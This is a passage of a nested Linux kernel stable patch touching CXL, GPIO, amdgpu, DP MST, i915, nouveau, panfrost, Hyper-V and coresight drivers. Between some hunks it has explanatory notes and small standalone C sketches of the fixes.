++		entry = (struct cdat_entry_header *)(t.response_pl + 1);
++		if ((entry_handle == 0 &&
++		     t.task.rv != sizeof(__le32) + sizeof(struct cdat_header)) ||
++		    (entry_handle > 0 &&
++		     (t.task.rv < sizeof(__le32) + sizeof(*entry) ||
++		      t.task.rv != sizeof(__le32) + le16_to_cpu(entry->length))))
+ 			return -EIO;
+ 
+ 		/* Get the CXL table access header entry handle */
+ 		entry_handle = FIELD_GET(CXL_DOE_TABLE_ACCESS_ENTRY_HANDLE,
+-					 t.response_pl[0]);
+-		entry = t.response_pl + 1;
+-		entry_dw = t.task.rv / sizeof(u32);
++					 le32_to_cpu(t.response_pl[0]));
++		entry_dw = t.task.rv / sizeof(__le32);
+ 		/* Skip Header */
+ 		entry_dw -= 1;
+-		entry_dw = min(length / sizeof(u32), entry_dw);
++		entry_dw = min(length / sizeof(__le32), entry_dw);
+ 		/* Prevent length < 1 DW from causing a buffer overflow */
+ 		if (entry_dw) {
+-			memcpy(data, entry, entry_dw * sizeof(u32));
+-			length -= entry_dw * sizeof(u32);
++			memcpy(data, entry, entry_dw * sizeof(__le32));
++			length -= entry_dw * sizeof(__le32);
+ 			data += entry_dw;
+ 		}
+ 	} while (entry_handle != CXL_DOE_TABLE_ACCESS_LAST_ENTRY);
+ 
++	/* Length in CDAT header may exceed concatenation of CDAT entries */
++	cdat->length -= length;
++
+ 	return 0;
+ }
+ 
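The CDAT fix treats the DOE response as what it is on the wire, little-endian dwords: the buffer is retyped as __le32, every value goes through le32_to_cpu() before use, and the reported entry length is checked against the bytes actually returned. A portable C sketch of endian-safe decoding plus that length check, making no assumption about host byte order (the struct layout mirrors the patch; the sample buffer is made up):

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Decode a little-endian 32-bit value regardless of host endianness. */
static uint32_t le32_to_cpu(const uint8_t *p)
{
	return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
	       ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

struct cdat_entry_hdr {		/* mirrors the patch's packed header */
	uint8_t type;
	uint8_t reserved;
	uint8_t length_le[2];	/* __le16 length */
};

/* Reject a response whose payload is shorter than the entry claims. */
static int check_entry(const uint8_t *resp, size_t resp_bytes)
{
	const struct cdat_entry_hdr *e;
	uint16_t entry_len;

	if (resp_bytes < 4 + sizeof(*e))	/* 1 DW header + entry hdr */
		return -1;

	e = (const struct cdat_entry_hdr *)(resp + 4);
	entry_len = (uint16_t)(e->length_le[0] | (e->length_le[1] << 8));

	return resp_bytes == 4 + entry_len ? 0 : -1;
}

int main(void)
{
	uint8_t buf[] = { 1, 0, 0, 0,  0, 0, 8, 0,  0xAA, 0xBB, 0xCC, 0xDD };

	printf("hdr=%#x ok=%d\n", le32_to_cpu(buf), check_entry(buf, sizeof(buf)));
	return 0;
}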
+diff --git a/drivers/cxl/cxlpci.h b/drivers/cxl/cxlpci.h
+index eec597dbe763a..79e5603dfc82d 100644
+--- a/drivers/cxl/cxlpci.h
++++ b/drivers/cxl/cxlpci.h
+@@ -71,6 +71,20 @@ static inline resource_size_t cxl_regmap_to_base(struct pci_dev *pdev,
+ 	return pci_resource_start(pdev, map->barno) + map->block_offset;
+ }
+ 
++struct cdat_header {
++	__le32 length;
++	u8 revision;
++	u8 checksum;
++	u8 reserved[6];
++	__le32 sequence;
++} __packed;
++
++struct cdat_entry_header {
++	u8 type;
++	u8 reserved;
++	__le16 length;
++} __packed;
++
+ int devm_cxl_port_enumerate_dports(struct cxl_port *port);
+ struct cxl_dev_state;
+ int cxl_hdm_decode_init(struct cxl_dev_state *cxlds, struct cxl_hdm *cxlhdm);
+diff --git a/drivers/gpio/Kconfig b/drivers/gpio/Kconfig
+index a01af11806164..e3af86f06c630 100644
+--- a/drivers/gpio/Kconfig
++++ b/drivers/gpio/Kconfig
+@@ -100,7 +100,7 @@ config GPIO_GENERIC
+ 	tristate
+ 
+ config GPIO_REGMAP
+-	depends on REGMAP
++	select REGMAP
+ 	tristate
+ 
+ # put drivers in the right section, in alphabetical order
+diff --git a/drivers/gpio/gpio-davinci.c b/drivers/gpio/gpio-davinci.c
+index 59c4c48d8296b..69f3d864f69d3 100644
+--- a/drivers/gpio/gpio-davinci.c
++++ b/drivers/gpio/gpio-davinci.c
+@@ -328,7 +328,7 @@ static struct irq_chip gpio_irqchip = {
+ 	.irq_enable	= gpio_irq_enable,
+ 	.irq_disable	= gpio_irq_disable,
+ 	.irq_set_type	= gpio_irq_type,
+-	.flags		= IRQCHIP_SET_TYPE_MASKED,
++	.flags		= IRQCHIP_SET_TYPE_MASKED | IRQCHIP_SKIP_SET_WAKE,
+ };
+ 
+ static void gpio_irq_handler(struct irq_desc *desc)
+@@ -645,9 +645,6 @@ static void davinci_gpio_save_context(struct davinci_gpio_controller *chips,
+ 		context->set_falling = readl_relaxed(&g->set_falling);
+ 	}
+ 
+-	/* Clear Bank interrupt enable bit */
+-	writel_relaxed(0, base + BINTEN);
+-
+ 	/* Clear all interrupt status registers */
+ 	writel_relaxed(GENMASK(31, 0), &g->intstat);
+ }
+diff --git a/drivers/gpio/gpio-mvebu.c b/drivers/gpio/gpio-mvebu.c
+index 1bb317b8dccea..91a4232ee58c2 100644
+--- a/drivers/gpio/gpio-mvebu.c
++++ b/drivers/gpio/gpio-mvebu.c
+@@ -657,9 +657,10 @@ static void mvebu_pwm_free(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	spin_unlock_irqrestore(&mvpwm->lock, flags);
+ }
+ 
+-static void mvebu_pwm_get_state(struct pwm_chip *chip,
+-				struct pwm_device *pwm,
+-				struct pwm_state *state) {
++static int mvebu_pwm_get_state(struct pwm_chip *chip,
++			       struct pwm_device *pwm,
++			       struct pwm_state *state)
++{
+ 
+ 	struct mvebu_pwm *mvpwm = to_mvebu_pwm(chip);
+ 	struct mvebu_gpio_chip *mvchip = mvpwm->mvchip;
+@@ -693,6 +694,8 @@ static void mvebu_pwm_get_state(struct pwm_chip *chip,
+ 		state->enabled = false;
+ 
+ 	spin_unlock_irqrestore(&mvpwm->lock, flags);
++
++	return 0;
+ }
+ 
+ static int mvebu_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 9ef83f3ab3a7e..9df5dcedaf3e2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -3034,6 +3034,24 @@ static int amdgpu_device_ip_suspend_phase2(struct amdgpu_device *adev)
+ 		     adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_MES))
+ 			continue;
+ 
++		/* SDMA 5.x+ is part of GFX power domain so it's covered by GFXOFF */
++		if (adev->in_s0ix &&
++		    (adev->ip_versions[SDMA0_HWIP][0] >= IP_VERSION(5, 0, 0)) &&
++		    (adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_SDMA))
++			continue;
++
++		/* During cold boot, swPSP provides the IMU and RLC FW binaries to TOS.
++		 * These live in TMR and are hence expected to be reused by PSP-TOS to
++		 * reload from that location; RLC Autoload also gets loaded from there
++		 * automatically, based on a PMFW -> PSP message during the re-init
++		 * sequence. Therefore, PSP suspend & resume should be skipped to avoid
++		 * destroying the TMR and reloading the FWs again for IMU-enabled APU ASICs.
++		 */
++		if (amdgpu_in_reset(adev) &&
++		    (adev->flags & AMD_IS_APU) && adev->gfx.imu.funcs &&
++		    adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_PSP)
++			continue;
++
+ 		/* XXX handle errors */
+ 		r = adev->ip_blocks[i].version->funcs->suspend(adev);
+ 		/* XXX handle errors */
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 050e7a52c8f62..6c5ea99223bab 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2175,6 +2175,8 @@ static int detect_mst_link_for_all_connectors(struct drm_device *dev)
+ 				DRM_ERROR("DM_MST: Failed to start MST\n");
+ 				aconnector->dc_link->type =
+ 					dc_connection_single;
++				ret = dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
++								     aconnector->dc_link);
+ 				break;
+ 			}
+ 		}
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 57454967617f8..6bd7e45370141 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -206,7 +206,7 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ 	if (enable)
+ 		drm_dp_add_payload_part1(mst_mgr, mst_state, payload);
+ 	else
+-		drm_dp_remove_payload(mst_mgr, mst_state, payload);
++		drm_dp_remove_payload(mst_mgr, mst_state, payload, payload);
+ 
+ 	/* mst_mgr->payloads are VC payloads; notify MST branch using DPCD or
+ 	 * AUX message. The sequence is slot 1-63 allocated sequence for each
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611.c b/drivers/gpu/drm/bridge/lontium-lt9611.c
+index 3b77238ca4aff..ae8c6d9d4095f 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611.c
+@@ -258,6 +258,7 @@ static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode
+ 		{ 0x8126, 0x55 },
+ 		{ 0x8127, 0x66 },
+ 		{ 0x8128, 0x88 },
++		{ 0x812a, 0x20 },
+ 	};
+ 
+ 	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi86.c b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+index eb24322df721a..aeca9c066bf29 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi86.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+@@ -1500,8 +1500,8 @@ out:
+ 	return ret;
+ }
+ 
+-static void ti_sn_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				struct pwm_state *state)
++static int ti_sn_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			       struct pwm_state *state)
+ {
+ 	struct ti_sn65dsi86 *pdata = pwm_chip_to_ti_sn_bridge(chip);
+ 	unsigned int pwm_en_inv;
+@@ -1512,19 +1512,19 @@ static void ti_sn_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	ret = regmap_read(pdata->regmap, SN_PWM_EN_INV_REG, &pwm_en_inv);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	ret = ti_sn65dsi86_read_u16(pdata, SN_BACKLIGHT_SCALE_REG, &scale);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	ret = ti_sn65dsi86_read_u16(pdata, SN_BACKLIGHT_REG, &backlight);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	ret = regmap_read(pdata->regmap, SN_PWM_PRE_DIV_REG, &pre_div);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	state->enabled = FIELD_GET(SN_PWM_EN_MASK, pwm_en_inv);
+ 	if (FIELD_GET(SN_PWM_INV_MASK, pwm_en_inv))
+@@ -1539,6 +1539,8 @@ static void ti_sn_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	if (state->duty_cycle > state->period)
+ 		state->duty_cycle = state->period;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops ti_sn_pwm_ops = {
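This hunk follows a tree-wide conversion of the pwm_ops get_state callback from void to int; the driver still returns 0 after a failed register read here, so behaviour is unchanged, but the new signature leaves room to propagate errors later. A small C model of the converted callback shape (the types and names below are simplified stand-ins, not the kernel's pwm API):

#include <errno.h>
#include <stdbool.h>
#include <stdio.h>

struct pwm_state {
	unsigned long period;
	unsigned long duty_cycle;
	bool enabled;
};

/* The callback now reports whether the state could be read at all. */
struct pwm_ops {
	int (*get_state)(void *chip, struct pwm_state *state);
};

static int demo_get_state(void *chip, struct pwm_state *state)
{
	(void)chip;
	/* A real driver could bail out with -EIO on a failed register read. */
	state->period = 1000000;
	state->duty_cycle = 250000;
	state->enabled = true;
	return 0;
}

int main(void)
{
	const struct pwm_ops ops = { .get_state = demo_get_state };
	struct pwm_state s;

	if (ops.get_state(NULL, &s))
		return 1;
	printf("period=%lu duty=%lu enabled=%d\n", s.period, s.duty_cycle, s.enabled);
	return 0;
}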
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index e77c674b37ca2..38dab76ae69ea 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -3342,7 +3342,8 @@ EXPORT_SYMBOL(drm_dp_add_payload_part1);
+  * drm_dp_remove_payload() - Remove an MST payload
+  * @mgr: Manager to use.
+  * @mst_state: The MST atomic state
+- * @payload: The payload to write
++ * @old_payload: The payload with its old state
++ * @new_payload: The payload to write
+  *
+  * Removes a payload from an MST topology if it was successfully assigned a start slot. Also updates
+  * the starting time slots of all other payloads which would have been shifted towards the start of
+@@ -3350,36 +3351,37 @@ EXPORT_SYMBOL(drm_dp_add_payload_part1);
+  */
+ void drm_dp_remove_payload(struct drm_dp_mst_topology_mgr *mgr,
+ 			   struct drm_dp_mst_topology_state *mst_state,
+-			   struct drm_dp_mst_atomic_payload *payload)
++			   const struct drm_dp_mst_atomic_payload *old_payload,
++			   struct drm_dp_mst_atomic_payload *new_payload)
+ {
+ 	struct drm_dp_mst_atomic_payload *pos;
+ 	bool send_remove = false;
+ 
+ 	/* We failed to make the payload, so nothing to do */
+-	if (payload->vc_start_slot == -1)
++	if (new_payload->vc_start_slot == -1)
+ 		return;
+ 
+ 	mutex_lock(&mgr->lock);
+-	send_remove = drm_dp_mst_port_downstream_of_branch(payload->port, mgr->mst_primary);
++	send_remove = drm_dp_mst_port_downstream_of_branch(new_payload->port, mgr->mst_primary);
+ 	mutex_unlock(&mgr->lock);
+ 
+ 	if (send_remove)
+-		drm_dp_destroy_payload_step1(mgr, mst_state, payload);
++		drm_dp_destroy_payload_step1(mgr, mst_state, new_payload);
+ 	else
+ 		drm_dbg_kms(mgr->dev, "Payload for VCPI %d not in topology, not sending remove\n",
+-			    payload->vcpi);
++			    new_payload->vcpi);
+ 
+ 	list_for_each_entry(pos, &mst_state->payloads, next) {
+-		if (pos != payload && pos->vc_start_slot > payload->vc_start_slot)
+-			pos->vc_start_slot -= payload->time_slots;
++		if (pos != new_payload && pos->vc_start_slot > new_payload->vc_start_slot)
++			pos->vc_start_slot -= old_payload->time_slots;
+ 	}
+-	payload->vc_start_slot = -1;
++	new_payload->vc_start_slot = -1;
+ 
+ 	mgr->payload_count--;
+-	mgr->next_start_slot -= payload->time_slots;
++	mgr->next_start_slot -= old_payload->time_slots;
+ 
+-	if (payload->delete)
+-		drm_dp_mst_put_port_malloc(payload->port);
++	if (new_payload->delete)
++		drm_dp_mst_put_port_malloc(new_payload->port);
+ }
+ EXPORT_SYMBOL(drm_dp_remove_payload);
+ 
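The substance of the drm_dp_remove_payload() change is which payload supplies the slot count during compaction: payloads behind the removed one must be shifted back by old_payload->time_slots, the allocation that actually occupied the slots, not by whatever the new state carries. A toy C model of that compaction over an array of payloads (field names follow the patch; everything else is illustrative):

#include <stdio.h>

struct payload {
	int vc_start_slot;	/* -1 means "never allocated" */
	int time_slots;
};

/* Remove 'victim' and close the gap using its *old* slot count. */
static void remove_payload(struct payload *p, int n, int victim,
			   int old_time_slots)
{
	int start = p[victim].vc_start_slot;

	if (start == -1)	/* nothing was ever allocated */
		return;

	for (int i = 0; i < n; i++)
		if (i != victim && p[i].vc_start_slot > start)
			p[i].vc_start_slot -= old_time_slots;

	p[victim].vc_start_slot = -1;
}

int main(void)
{
	struct payload p[] = { {0, 4}, {4, 8}, {12, 2} };

	remove_payload(p, 3, 1, 8);
	for (int i = 0; i < 3; i++)
		printf("payload %d: start=%d\n", i, p[i].vc_start_slot);
	return 0;
}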
+diff --git a/drivers/gpu/drm/i915/display/intel_color.c b/drivers/gpu/drm/i915/display/intel_color.c
+index c85757f55112b..78211e583fd7e 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.c
++++ b/drivers/gpu/drm/i915/display/intel_color.c
+@@ -2098,6 +2098,25 @@ static void glk_read_luts(struct intel_crtc_state *crtc_state)
+ 	}
+ }
+ 
++static void icl_color_commit_arm(const struct intel_crtc_state *crtc_state)
++{
++	struct intel_crtc *crtc = to_intel_crtc(crtc_state->uapi.crtc);
++	struct drm_i915_private *i915 = to_i915(crtc->base.dev);
++	enum pipe pipe = crtc->pipe;
++
++	/*
++	 * We don't (yet) allow userspace to control the pipe background color,
++	 * so force it to black.
++	 */
++	intel_de_write(i915, SKL_BOTTOM_COLOR(pipe), 0);
++
++	intel_de_write(i915, GAMMA_MODE(crtc->pipe),
++		       crtc_state->gamma_mode);
++
++	intel_de_write_fw(i915, PIPE_CSC_MODE(crtc->pipe),
++			  crtc_state->csc_mode);
++}
++
+ static struct drm_property_blob *
+ icl_read_lut_multi_segment(struct intel_crtc *crtc)
+ {
+@@ -2183,7 +2202,7 @@ static const struct intel_color_funcs i9xx_color_funcs = {
+ static const struct intel_color_funcs icl_color_funcs = {
+ 	.color_check = icl_color_check,
+ 	.color_commit_noarm = icl_color_commit_noarm,
+-	.color_commit_arm = skl_color_commit_arm,
++	.color_commit_arm = icl_color_commit_arm,
+ 	.load_luts = icl_load_luts,
+ 	.read_luts = icl_read_luts,
+ };
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.c b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+index 27c2098dd7070..9a6822256ddf6 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+@@ -364,8 +364,14 @@ static void intel_mst_disable_dp(struct intel_atomic_state *state,
+ 	struct intel_dp *intel_dp = &dig_port->dp;
+ 	struct intel_connector *connector =
+ 		to_intel_connector(old_conn_state->connector);
+-	struct drm_dp_mst_topology_state *mst_state =
+-		drm_atomic_get_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	struct drm_dp_mst_topology_state *old_mst_state =
++		drm_atomic_get_old_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	struct drm_dp_mst_topology_state *new_mst_state =
++		drm_atomic_get_new_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	const struct drm_dp_mst_atomic_payload *old_payload =
++		drm_atomic_get_mst_payload_state(old_mst_state, connector->port);
++	struct drm_dp_mst_atomic_payload *new_payload =
++		drm_atomic_get_mst_payload_state(new_mst_state, connector->port);
+ 	struct drm_i915_private *i915 = to_i915(connector->base.dev);
+ 
+ 	drm_dbg_kms(&i915->drm, "active links %d\n",
+@@ -373,8 +379,8 @@ static void intel_mst_disable_dp(struct intel_atomic_state *state,
+ 
+ 	intel_hdcp_disable(intel_mst->connector);
+ 
+-	drm_dp_remove_payload(&intel_dp->mst_mgr, mst_state,
+-			      drm_atomic_get_mst_payload_state(mst_state, connector->port));
++	drm_dp_remove_payload(&intel_dp->mst_mgr, new_mst_state,
++			      old_payload, new_payload);
+ 
+ 	intel_audio_codec_disable(encoder, old_crtc_state, old_conn_state);
+ }
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index bfd1ffc71a489..fc4a846289855 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -2017,6 +2017,8 @@ process_csb(struct intel_engine_cs *engine, struct i915_request **inactive)
+ 	 * inspecting the queue to see if we need to resubmit.
+ 	 */
+ 	if (*prev != *execlists->active) { /* elide lite-restores */
++		struct intel_context *prev_ce = NULL, *active_ce = NULL;
++
+ 		/*
+ 		 * Note the inherent discrepancy between the HW runtime,
+ 		 * recorded as part of the context switch, and the CPU
+@@ -2028,9 +2030,15 @@ process_csb(struct intel_engine_cs *engine, struct i915_request **inactive)
+ 		 * and correct ourselves later when updating from HW.
+ 		 */
+ 		if (*prev)
+-			lrc_runtime_stop((*prev)->context);
++			prev_ce = (*prev)->context;
+ 		if (*execlists->active)
+-			lrc_runtime_start((*execlists->active)->context);
++			active_ce = (*execlists->active)->context;
++		if (prev_ce != active_ce) {
++			if (prev_ce)
++				lrc_runtime_stop(prev_ce);
++			if (active_ce)
++				lrc_runtime_start(active_ce);
++		}
+ 		new_timeslice(execlists);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/i915_perf.c b/drivers/gpu/drm/i915/i915_perf.c
+index 0defbb43ceea8..3ce49c118b83f 100644
+--- a/drivers/gpu/drm/i915/i915_perf.c
++++ b/drivers/gpu/drm/i915/i915_perf.c
+@@ -4270,13 +4270,13 @@ int i915_perf_add_config_ioctl(struct drm_device *dev, void *data,
+ 		err = oa_config->id;
+ 		goto sysfs_err;
+ 	}
+-
+-	mutex_unlock(&perf->metrics_lock);
++	id = oa_config->id;
+ 
+ 	drm_dbg(&perf->i915->drm,
+ 		"Added config %s id=%i\n", oa_config->uuid, oa_config->id);
++	mutex_unlock(&perf->metrics_lock);
+ 
+-	return oa_config->id;
++	return id;
+ 
+ sysfs_err:
+ 	mutex_unlock(&perf->metrics_lock);
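The i915_perf fix copies oa_config->id into a local while metrics_lock is still held; once the lock drops, a concurrent remove could free oa_config, so dereferencing it afterwards would be a use-after-free. The general copy-before-unlock shape, sketched with pthreads (the struct and names are invented for illustration):

#include <pthread.h>
#include <stdio.h>

struct config { int id; };

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

/* Return the id of a lock-protected object without touching it unlocked. */
static int publish_config(struct config *cfg)
{
	int id;

	pthread_mutex_lock(&lock);
	id = cfg->id;	/* copy while the object is guaranteed alive */
	printf("added config id=%d\n", cfg->id);	/* still under lock */
	pthread_mutex_unlock(&lock);

	return id;	/* safe even if cfg is freed concurrently now */
}

int main(void)
{
	struct config c = { .id = 42 };

	printf("returned %d\n", publish_config(&c));
	return 0;
}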
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index 64eacd11b8bff..2372bfa04aa87 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -3747,9 +3747,10 @@
+ 
+ /* Skylake+ pipe bottom (background) color */
+ #define _SKL_BOTTOM_COLOR_A		0x70034
++#define _SKL_BOTTOM_COLOR_B		0x71034
+ #define   SKL_BOTTOM_COLOR_GAMMA_ENABLE		REG_BIT(31)
+ #define   SKL_BOTTOM_COLOR_CSC_ENABLE		REG_BIT(30)
+-#define SKL_BOTTOM_COLOR(pipe)		_MMIO_PIPE2(pipe, _SKL_BOTTOM_COLOR_A)
++#define SKL_BOTTOM_COLOR(pipe)		_MMIO_PIPE(pipe, _SKL_BOTTOM_COLOR_A, _SKL_BOTTOM_COLOR_B)
+ 
+ #define _ICL_PIPE_A_STATUS			0x70058
+ #define ICL_PIPESTATUS(pipe)			_MMIO_PIPE2(pipe, _ICL_PIPE_A_STATUS)
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/disp.c b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+index 33c97d510999b..006cb76adaa93 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/disp.c
++++ b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+@@ -410,6 +410,35 @@ nv50_outp_atomic_check_view(struct drm_encoder *encoder,
+ 	return 0;
+ }
+ 
++static void
++nv50_outp_atomic_fix_depth(struct drm_encoder *encoder, struct drm_crtc_state *crtc_state)
++{
++	struct nv50_head_atom *asyh = nv50_head_atom(crtc_state);
++	struct nouveau_encoder *nv_encoder = nouveau_encoder(encoder);
++	struct drm_display_mode *mode = &asyh->state.adjusted_mode;
++	unsigned int max_rate, mode_rate;
++
++	switch (nv_encoder->dcb->type) {
++	case DCB_OUTPUT_DP:
++		max_rate = nv_encoder->dp.link_nr * nv_encoder->dp.link_bw;
++
++		/* we don't support more than 10 anyway */
++		asyh->or.bpc = min_t(u8, asyh->or.bpc, 10);
++
++		/* reduce the bpc until it works out */
++		while (asyh->or.bpc > 6) {
++			mode_rate = DIV_ROUND_UP(mode->clock * asyh->or.bpc * 3, 8);
++			if (mode_rate <= max_rate)
++				break;
++
++			asyh->or.bpc -= 2;
++		}
++		break;
++	default:
++		break;
++	}
++}
++
+ static int
+ nv50_outp_atomic_check(struct drm_encoder *encoder,
+ 		       struct drm_crtc_state *crtc_state,
+@@ -428,6 +457,9 @@ nv50_outp_atomic_check(struct drm_encoder *encoder,
+ 	if (crtc_state->mode_changed || crtc_state->connectors_changed)
+ 		asyh->or.bpc = connector->display_info.bpc;
+ 
++	/* We might have to reduce the bpc */
++	nv50_outp_atomic_fix_depth(encoder, crtc_state);
++
+ 	return 0;
+ }
+ 
+@@ -996,7 +1028,7 @@ nv50_msto_prepare(struct drm_atomic_state *state,
+ 
+ 	// TODO: Figure out if we want to do a better job of handling VCPI allocation failures here?
+ 	if (msto->disabled) {
+-		drm_dp_remove_payload(mgr, mst_state, payload);
++		drm_dp_remove_payload(mgr, mst_state, payload, payload);
+ 	} else {
+ 		if (msto->enabled)
+ 			drm_dp_add_payload_part1(mgr, mst_state, payload);
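nv50_outp_atomic_fix_depth() walks the bpc down in steps of 2 until the mode's bandwidth fits the DP link, using the rate formula from the hunk (mode_rate = clock * bpc * 3 / 8, rounded up). The same loop as a standalone function, with made-up sample numbers:

#include <stdio.h>

#define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))

/* Reduce bpc (capped at 10, floored at 6) until the mode fits the link. */
static unsigned int fix_depth(unsigned int bpc, unsigned int clock_khz,
			      unsigned int max_rate)
{
	if (bpc > 10)
		bpc = 10;

	while (bpc > 6) {
		unsigned int mode_rate = DIV_ROUND_UP(clock_khz * bpc * 3, 8);

		if (mode_rate <= max_rate)
			break;
		bpc -= 2;
	}
	return bpc;
}

int main(void)
{
	/* e.g. a 4k mode against a modest link budget */
	printf("bpc=%u\n", fix_depth(16, 594000, 1500000));
	return 0;
}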
+diff --git a/drivers/gpu/drm/nouveau/nouveau_dp.c b/drivers/gpu/drm/nouveau/nouveau_dp.c
+index 20db8ea1a0baf..53185746fb3d1 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_dp.c
++++ b/drivers/gpu/drm/nouveau/nouveau_dp.c
+@@ -245,8 +245,6 @@ void nouveau_dp_irq(struct nouveau_drm *drm,
+ }
+ 
+ /* TODO:
+- * - Use the minimum possible BPC here, once we add support for the max bpc
+- *   property.
+  * - Validate against the DP caps advertised by the GPU (we don't check these
+  *   yet)
+  */
+@@ -258,7 +256,11 @@ nv50_dp_mode_valid(struct drm_connector *connector,
+ {
+ 	const unsigned int min_clock = 25000;
+ 	unsigned int max_rate, mode_rate, ds_max_dotclock, clock = mode->clock;
+-	const u8 bpp = connector->display_info.bpc * 3;
++	/* Always check with the minimum bpc, so we can advertise better modes.
++	 * In particular, not doing this causes modes to be dropped on HDR
++	 * displays, as we might otherwise check with a bpc as high as 16.
++	 */
++	const u8 bpp = 6 * 3;
+ 
+ 	if (mode->flags & DRM_MODE_FLAG_INTERLACE && !outp->caps.dp_interlace)
+ 		return MODE_NO_INTERLACE;
+diff --git a/drivers/gpu/drm/panfrost/panfrost_mmu.c b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+index 666a5e53fe193..e961fa27702ce 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_mmu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+@@ -504,6 +504,7 @@ static int panfrost_mmu_map_fault_addr(struct panfrost_device *pfdev, int as,
+ 		if (IS_ERR(pages[i])) {
+ 			mutex_unlock(&bo->base.pages_lock);
+ 			ret = PTR_ERR(pages[i]);
++			pages[i] = NULL;
+ 			goto err_pages;
+ 		}
+ 	}
+diff --git a/drivers/hv/connection.c b/drivers/hv/connection.c
+index 9dc27e5d367a2..da51b50787dff 100644
+--- a/drivers/hv/connection.c
++++ b/drivers/hv/connection.c
+@@ -409,6 +409,10 @@ void vmbus_disconnect(void)
+  */
+ struct vmbus_channel *relid2channel(u32 relid)
+ {
++	if (vmbus_connection.channels == NULL) {
++		pr_warn_once("relid2channel: relid=%d: No channels mapped!\n", relid);
++		return NULL;
++	}
+ 	if (WARN_ON(relid >= MAX_CHANNEL_RELIDS))
+ 		return NULL;
+ 	return READ_ONCE(vmbus_connection.channels[relid]);
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index c7a65d1524fcb..1cf7478da6ee8 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -451,7 +451,7 @@ static int etm4_enable_hw(struct etmv4_drvdata *drvdata)
+ 		if (etm4x_sspcicrn_present(drvdata, i))
+ 			etm4x_relaxed_write32(csa, config->ss_pe_cmp[i], TRCSSPCICRn(i));
+ 	}
+-	for (i = 0; i < drvdata->nr_addr_cmp; i++) {
